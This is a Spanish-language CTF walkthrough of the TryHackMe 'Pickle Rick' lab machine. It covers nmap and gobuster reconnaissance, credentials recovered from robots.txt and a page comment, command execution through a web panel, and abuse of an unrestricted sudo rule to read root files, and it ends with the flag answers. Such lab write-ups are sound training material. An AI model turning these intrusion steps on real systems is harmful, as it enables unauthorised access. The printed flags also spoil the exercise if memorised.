LaCashita!

[TRYHACKME] Pickle Rick

Hoy vamos a hackear la maquina de TryHackMe llamada PickleRick.Podeis descargarla desde el siguiente enlace: PickleRick

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


~ > nmap -A -p- 10.10.61.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 04:31 CEST
Nmap scan report for 10.10.61.13
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 8a:b4:b0:1f:2d:08:1d:d1:52:2c:4a:ee:88:2c:d5:92 (RSA)
|   256 36:14:22:35:a2:a8:80:b3:1d:6d:55:99:e3:fa:2a:f6 (ECDSA)
|_  256 94:e7:79:5d:6e:69:e8:32:0b:cd:94:d0:0d:67:d3:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds

Exploramos un poco mas el puerto 80 para ver si encontramos algo interesante.


~ > gobuster dir -u http://10.10.61.13 -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.13
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/08/08 04:34:43 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/assets (Status: 301)
/denied.php (Status: 302)
/index.html (Status: 200)
/login.php (Status: 200)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/08 04:35:30 Finished
===============================================================

Encontramos login.php y portal.php, los cuales nos piden credenciales para entrar. En http://10.10.61.13/robots.txt vemos: Wubbalubbadubdub Y por otro lado, en el codigo fuente de la pagina inicial podemos ver que hay comentado lo siguiente:


Note to self, remember username!
Username: R1ckRul3s

Con los datos obtenidos, accedemos a login.php y metemos los credenciales:


R1ckRul3s/Wubbalubbadubdub

En el command Panel hacemos un "ls" y vemos que hay un fichero:


Sup3rS3cretPickl3Ingred.txt

1 Ingrediente

Al tratar de usar "cat" nos da problemas, asi que usamos el comando "less" para ver el contenido de los ficheros.


less Sup3rS3cretPickl3Ingred.txt

Al ejecutarlo nos devuelve el primer ingrediente:


mr. meeseek hair

2 Ingrediente

Tras buscar, podemos ver que el segundo ingrediente se encuentra en /home/rick, para ver el ingrediente ejecutamos:


less /home/rick/"second ingredients"
1 jerry tear

3 Ingrediente

Por ultimo, y para encontrar el 3 y ultimo ingrediente, suponemos que esta en la carpeta root, con lo cual necesitaremos permisos para verla. Si en la web ejecutamos el comando:


sudo - l

Nos devuelve:


Matching Defaults entries for www-data on 
ip-10-10-61-13.eu-west-1.compute.internal:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User www-data may run the following commands on 
ip-10-10-61-13.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

Bien, podemos usar sudo para ver el contenido de los ficheros del sistema y tendremos permisos de root. Miramos el contenido del directorio de root:


sudo ls -a /root
---SNIP---
3rd.txt
---SNIP---

Vemos que esta el fichero 3rd.txt. Vamos a ver su contenido :)


sudo less /root/3rd.txt
3rd ingredients: fleeb juice

Con esto ya tendriamos todos los ingredientes :)